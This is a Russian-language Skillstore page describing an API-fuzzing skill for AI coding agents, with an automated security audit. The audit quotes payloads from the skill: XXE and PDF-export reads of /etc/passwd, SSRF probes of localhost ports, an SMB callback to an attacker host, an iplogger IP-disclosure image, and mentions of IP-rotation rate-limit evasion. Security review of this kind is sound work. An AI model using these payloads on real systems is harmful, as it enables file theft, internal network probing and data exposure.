Навыки api-fuzzing-for-bug-bounty
📦

api-fuzzing-for-bug-bounty

v1.1 Ревизия содержимого r1 Критично ⚙️ Внешние команды🌐 Доступ к сети

Тестирование API для находок Bug Bounty

Тестировщикам API нужны повторяемые проверки скрытых эндпоинтов, ошибок авторизации и проблем с инъекциями. Этот навык организует рабочие процессы API fuzzing для авторизованных программ bug bounty и пентестинга.

Поддерживает: Claude Codex Code(CC)
⚠️ 38 Плохо

Установить с помощью моего Агента

Скопируйте этот запрос в своего Агента. Он содержит каноническую страницу Skill и манифест.

Запрос агента
Review the Skillstore skill "api-fuzzing-for-bug-bounty" from https://skillstore.io/skills/sickn33-api-fuzzing-for-bug-bounty.md and its manifest at https://skillstore.io/api/skills/sickn33-api-fuzzing-for-bug-bounty/manifest. Verify the artifact. Do not auto-install. Inspect the skill and report your findings, then wait for an operator or manual installation decision.

Ваш Агент по-прежнему должен показать план и запросить все подтверждения, требуемые политикой безопасности.

Ресурсы для AI-агентов

Используйте эти ссылки, когда AI-агенту, crawler или script нужен чистый контекст вместо полной страницы.

Протестировать

Использование «api-fuzzing-for-bug-bounty». Help me test an in-scope API for IDOR.

Ожидаемый результат:

Приоритизированный чеклист, охватывающий идентификаторы объектов, пары ролей, negative controls и заметки по доказательствам для авторизованного тестирования.

Использование «api-fuzzing-for-bug-bounty». Review a GraphQL endpoint for common risks.

Ожидаемый результат:

  • Проверьте, доступен ли introspection в production.
  • Проверьте mutations на отсутствующие проверки авторизации.
  • Тестируйте batching и вложенные запросы в пределах одобренных лимитов.

Использование «api-fuzzing-for-bug-bounty». Turn my API findings into a report outline.

Ожидаемый результат:

Структура отчета с резюме, затронутыми эндпоинтами, влиянием, шагами воспроизведения, доказательствами и рекомендациями по исправлению.

Аудит безопасности

Критично

Most external command detections are false positives caused by Markdown fences and inline examples, not executable skill code. The content still contains high-risk dual-use API exploitation guidance, including local file access payloads, SSRF and internal port probes, sensitive data extraction examples, IP disclosure, and rate-limit evasion guidance.

1
Просканировано файлов
434
Проанализировано строк
10
Пункты проверки
0
Ложные срабатывания проигнорированы

Подтверждённые проблемы безопасности (4)

Критично
System password file access
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
The XXE payload directly references file:///etc/passwd, a sensitive system file, as the intended read target. Even as documentation, it teaches local file exfiltration from vulnerable systems.
Критично
System password file access
<iframe src="file:///etc/passwd" height=1000 width=800>
The PDF export payload embeds file:///etc/passwd, a sensitive system file, as the intended read target. Even as documentation, it teaches local file exfiltration from vulnerable systems.
Высокий
Unsafe Offensive API Exploitation Guidance
The skill frames API testing as bug bounty work but does not require written authorization before teaching IDOR exploitation, endpoint bypasses, and rate-limit evasion with IP rotation.
The cited lines explicitly describe IDOR exploitation, unauthorized data access deliverables, bypass attempts, and IP rotation. The surrounding purpose is security testing, but the file lacks strong authorization guardrails.
Высокий
Sensitive Data Extraction Examples
The GraphQL example requests another user identifier and asks for sensitive fields such as password and credit card data, while another example uses a tracking URL for IP disclosure.
The examples directly name OTHER_USER_ID, password, creditCard, and an IP disclosure tracking URL. This is clear sensitive data access guidance beyond generic API testing.
Пункты проверки возможностей (10)

Это реальные локальные возможности, которые могут ожидаться для этого навыка, поэтому они требуют проверки, но не считаются подтверждённым вредоносным поведением.

Высокий
Hardcoded URL
<object data="http://127.0.0.1:8443"/>
This localhost URL appears in an SSRF attack example and is intended to make a target server probe internal services. It is documentation only, but the context is offensive network abuse testing.
Высокий
Hardcoded URL
<img src="http://127.0.0.1:445"/>
This localhost URL appears in an SSRF attack example and targets an internal port through server-side fetching. It is documentation only, but the context is offensive network abuse testing.
Высокий
Hardcoded URL
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
The attacker-controlled SMB/DNS callback path is presented as a path traversal test and could disclose server network behavior. It is documentation only, but the payload is designed for outbound interaction with an attacker host.
Высокий
Hardcoded URL
<object data="http://127.0.0.1:8443"/>
This localhost URL appears in PDF export SSRF guidance and is intended to make the renderer access an internal service. It is documentation only, but the context is offensive network abuse testing.
Высокий
Hardcoded URL
<img src="http://127.0.0.1:445"/>
This localhost URL appears in a port scanning example through PDF rendering. It is documentation only, but the payload is designed to probe internal services.
Высокий
Hardcoded URL
<img src="https://iplogger.com/yourcode.gif"/>
The iplogger URL is explicitly labeled as an IP disclosure technique and uses a third-party tracking endpoint. That creates a clear data exfiltration risk if copied into a target workflow.
Высокий
Hardcoded IP address
<object data="http://127.0.0.1:8443"/>
The hardcoded 127.0.0.1 address is part of an SSRF payload that asks a target server to access localhost. This is intentional internal service probing content, not a benign placeholder.
Высокий
Hardcoded IP address
<img src="http://127.0.0.1:445"/>
The hardcoded 127.0.0.1 address is part of an SSRF payload aimed at an internal port. This is intentional internal service probing content, not a benign placeholder.
Высокий
Hardcoded IP address
<object data="http://127.0.0.1:8443"/>
The hardcoded 127.0.0.1 address is used in PDF export SSRF guidance. It is intended to make server-side rendering reach an internal service.
Высокий
Hardcoded IP address
<img src="http://127.0.0.1:445"/>
The hardcoded 127.0.0.1 address is used for a PDF-based port scanning example. It is intentional internal network probing content.

Обнаруженные паттерны

System password file access×2
Поделиться и цитировать этот отчет

Делитесь версионным отчетом об оценке, нейтральным значком, встраиваемой карточкой и цитатами. Skillstore публикует доказательства, не решая, безопасен ли этот Skill.

Открыть версионный отчет
Оценка безопасности

Копировать ссылку на отчёт

https://skillstore.io/skills/sickn33-api-fuzzing-for-bug-bounty/audits/4?utm_source=security_passport&utm_medium=share&utm_campaign=versioned_report

Значок Markdown

[![Skillstore security assessment](https://skillstore.io/badges/skills/sickn33-api-fuzzing-for-bug-bounty/security.svg)](https://skillstore.io/skills/sickn33-api-fuzzing-for-bug-bounty?utm_source=security_passport_badge)

Значок HTML

<a href="https://skillstore.io/skills/sickn33-api-fuzzing-for-bug-bounty?utm_source=security_passport_badge"><img src="https://skillstore.io/badges/skills/sickn33-api-fuzzing-for-bug-bounty/security.svg" alt="Skillstore security assessment" loading="lazy"></a>

Встраиваемая карточка

<iframe src="https://skillstore.io/embed/skills/sickn33-api-fuzzing-for-bug-bounty.html" title="Skillstore Security Assessment" sandbox="allow-popups allow-popups-to-escape-sandbox" loading="lazy" referrerpolicy="no-referrer" width="420" height="180"></iframe>
Академические ссылки (APA · BibTeX · CFF)

Цитата APA

sickn33. (2026). api-fuzzing-for-bug-bounty security audit report (audit version 4) [Author version 1.1]. Skillstore. https://skillstore.io/skills/sickn33-api-fuzzing-for-bug-bounty/audits/4

Цитата BibTeX

@techreport{sickn33-sickn33-api-fuzzing-for-bug-bounty-2026, author = {sickn33}, title = {api-fuzzing-for-bug-bounty security audit report (audit version 4)}, institution = {Skillstore}, year = {2026}, number = {4}, url = {https://skillstore.io/skills/sickn33-api-fuzzing-for-bug-bounty/audits/4}, note = {Author version 1.1} }

CITATION.cff

cff-version: 1.2.0 message: "If you use this Skill, cite its author and this versioned security audit report." title: "api-fuzzing-for-bug-bounty security audit report (audit version 4)" version: "1.1" type: report authors: - name: "sickn33" date-released: "2026-07-06" url: "https://skillstore.io/skills/sickn33-api-fuzzing-for-bug-bounty/audits/4" identifiers: - type: other value: "skillstore:sickn33-api-fuzzing-for-bug-bounty:audit:4" description: "Skillstore immutable audit report identifier"

Оценка Skillstore

Почему такая оценка Достоверность доказательств: Средний
55
Архитектура
85
Сопровождаемость
87
Контент
69
Сообщество
83
Соответствие спецификации

Что вы можете построить

Планирование API-ревью для Bug Bounty

Создайте чеклист в рамках scope для обнаружения эндпоинтов, проверок авторизации и сбора доказательств.

Создание внутреннего чеклиста тестирования API

Преобразуйте темы безопасности API в повторяемые проверки для ревью безопасности продукта.

Подготовка задач для оценки GraphQL

Организуйте тесты GraphQL introspection, batching, вложенных запросов и авторизации для клиентского проекта.

Попробуйте эти промпты

Начать API Recon
Создайте чеклист авторизованной разведки API для этой цели в рамках scope. Включите анализ документации, обнаружение эндпоинтов, проверки версий и заметки по безопасному сбору доказательств.
Проверить риск IDOR
С учетом этих эндпоинтов в рамках scope и описаний ролей предложите безопасные тесты IDOR, которые избегают доступа к реальным пользовательским данным.
Оценить поверхность GraphQL
Проанализируйте этот фрагмент схемы GraphQL на рискованные queries, mutations, проблемы batching и доступность introspection в тестовой среде.
Спланировать полный API Fuzzing
Постройте поэтапный план fuzzing для моей одобренной bug bounty цели, включая контроль scope, rate limits, сбор доказательств и критерии отчетности.

Лучшие практики

  • Подтвердите письменное разрешение и scope перед тестированием любого эндпоинта.
  • Используйте синтетические аккаунты и тестовые данные при проверке границ авторизации.
  • Ограничивайте частоту запросов и согласовывайте рискованные тесты с владельцем программы.

Избегать

  • Тестирование production APIs без разрешения или за пределами указанного scope.
  • Использование payloads, которые извлекают реальные файлы, секреты или персональные данные.
  • Обход rate limits с помощью IP rotation вместо одобренных окон тестирования.

Часто задаваемые вопросы

Этот навык предназначен только для авторизованного тестирования?
Да. Используйте его только для APIs, на которые у вас есть письменное разрешение и определенный scope.
Может ли он запускать инструменты API fuzzing?
Нет. Он предоставляет рабочие процессы и prompts. Вы должны самостоятельно выбирать инструменты и использовать их ответственно.
Поддерживает ли он тестирование GraphQL?
Да. Он охватывает introspection, batching, вложенные запросы и ревью авторизации GraphQL.
Могут ли начинающие использовать его?
Да, но начинающим следует стартовать в лабораторной среде или на одобренной учебной цели.
Какие доказательства следует собирать?
Собирайте детали эндпоинтов, контекст запросов, роли аккаунтов, скриншоты, временные метки и четкие заметки о влиянии.
Как следует проводить рискованные тесты?
Согласовывайте действия с владельцем, используйте тестовые данные, ограничивайте объем запросов и останавливайтесь, если влияние выходит за пределы scope.

Сведения для разработчиков

Автор

sickn33

Лицензия

MIT

Версия автора

v1.1

Ревизия Skillstore

r1

Примечание о версии

Заявленная автором версия не соответствует SemVer.

Ссылка

e397ce5a135369cd6def89cb6400d013e2f68f2f

Актуальность поддержки

18.07.2026

Использование

7 загрузок · 113 просмотров

Структура файлов

📄 SKILL.md

Больше от sickn33

Показать все
📦

content-creator

88

Создание маркетингового контента в едином стиле бренда

Маркетинговым командам нужен контент, который остается согласованным во всех каналах. Этот навык помогает планировать, писать, анализировать и оптимизировать контент с учетом голоса бренда и SEO.

Письмо и контент Просмотр
📦

prompt-engineering-patterns

85

Улучшайте LLM-промпты с помощью проверенных паттернов

Непоследовательные промпты тратят время и снижают доверие к результатам AI. Этот навык помогает проектировать промпты с использованием переиспользуемых паттернов, примеров, этапов оценки и рабочих процессов оптимизации.

Продуктивность Просмотр
📦

senior-architect

81

Проектируйте масштабируемые архитектуры ПО

Архитектурные решения сложно сравнивать для веб-, мобильных, backend- и облачных систем. Этот навык предоставляет структурированные руководства и локальные скрипты-заготовки для отчетов, анализа зависимостей и документирования компромиссов.

Кодинг и разработка Просмотр
📦

senior-fullstack

81

Создавайте fullstack-приложения с senior-паттернами

Командам нужны единые рекомендации по настройке, архитектуре и ревью для современных веб-приложений. Этот skill предоставляет scaffolders, справочные материалы по рабочим процессам и quality prompts для проектов на React, Next.js, Node.js, GraphQL и PostgreSQL.

Кодинг и разработка Просмотр
📦

product-manager-toolkit

80

Приоритизируйте продуктовую работу с помощью исследовательских инсайтов

Продуктовым командам нужны более быстрые способы ранжировать функции, обобщать интервью и документировать решения. Этот навык предоставляет RICE-оценку, анализ интервью и шаблоны PRD для структурированного планирования.

Продуктивность Просмотр
Показать все
📦

senior-security

81

Усиление проверок безопасности приложений

от alirezarezvani

Проверкам безопасности часто не хватает единообразных чек-листов и переиспользуемых рабочих процессов. Этот навык предоставляет заготовки для проверок безопасности, справочные рекомендации и простые скрипты для отчетности для Claude, Codex и Claude Code.

Безопасность и соответствие требованиям Просмотр
📦

global-validation

79

Проверка входных данных во всех точках входа

от EIS-ITS

Проверка входных данных часто становится несогласованной в формах, API и бизнес-правилах. Этот навык направляет Claude, Codex и Claude Code к безопасным шаблонам валидации.

Безопасность и соответствие требованиям Просмотр
📦

auth-handler

79

Защита маршрутов аутентификации Next.js

от AayushBaniya2006

Изменения в аутентификации часто приводят к сбоям, когда команды смешивают session APIs и route guards. Этот навык направляет Claude, Codex и Claude Code к проектным вспомогательным функциям для безопасного контроля доступа.

Безопасность и соответствие требованиям Просмотр
📦

security-report

78

Создание отчетов об оценке безопасности

от BytR-Ecosystems

Результаты проверок безопасности сложно ясно представить руководителям и техническим командам. Этот навык создает структурированные отчеты DOCX с рейтингами риска и рекомендациями по устранению.

Безопасность и соответствие требованиям Просмотр
📦

API JWT Authenticator

78

Защита API FastAPI с помощью JWT-аутентификации

от Abdul-Haseeb360

JWT-аутентификацию бывает сложно реализовать единообразно в сервисах FastAPI. Этот навык помогает с валидацией токенов, контролем доступа и безопасной обработкой ошибок.

Безопасность и соответствие требованиям Просмотр